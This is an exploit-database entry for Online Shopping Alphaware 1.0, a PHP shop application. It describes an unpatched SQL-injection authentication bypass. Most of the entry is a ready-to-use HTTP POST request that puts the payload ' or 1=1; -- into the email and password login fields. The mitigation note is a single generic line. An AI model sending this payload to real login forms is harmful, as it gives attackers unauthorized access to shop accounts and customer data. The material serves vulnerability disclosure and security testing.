Online Shopping Alphaware 1.0 - Authentication Bypass

vendor:

Online Shopping Alphaware

by:

Ahmed Abbas

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Online Shopping Alphaware

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcecodester:online_shopping_alphaware

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4

2020

Online Shopping Alphaware 1.0 – Authentication Bypass

An attacker can bypass the authentication of Online Shopping Alphaware 1.0 by sending a malicious POST request to the target. The malicious POST request contains an email and password field with the value '+or+1%3d1%3b+--+ahmed'. This will bypass the authentication and allow the attacker to gain access to the application.

Mitigation:

Implement proper authentication and authorization mechanisms to prevent unauthorized access.

Source

Exploit-DB raw data:

# Title: Online Shopping Alphaware 1.0 - Authentication Bypass
# Exploit Author: Ahmed Abbas
# Date: 2020-07-28
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
 
# Malicious POST Request to https://TARGET
POST /alphaware/index.php HTTP/1.1
Host: 172.16.65.130
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/alphaware/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
DNT: 1
Connection: close
Cookie: PHPSESSID=gqhv9sl4d1bdtr4pspm887ft2n
Upgrade-Insecure-Requests: 1

email='+or+1%3d1%3b+--+ahmed&password='+or+1%3d1%3b+--+ahmed&login=Login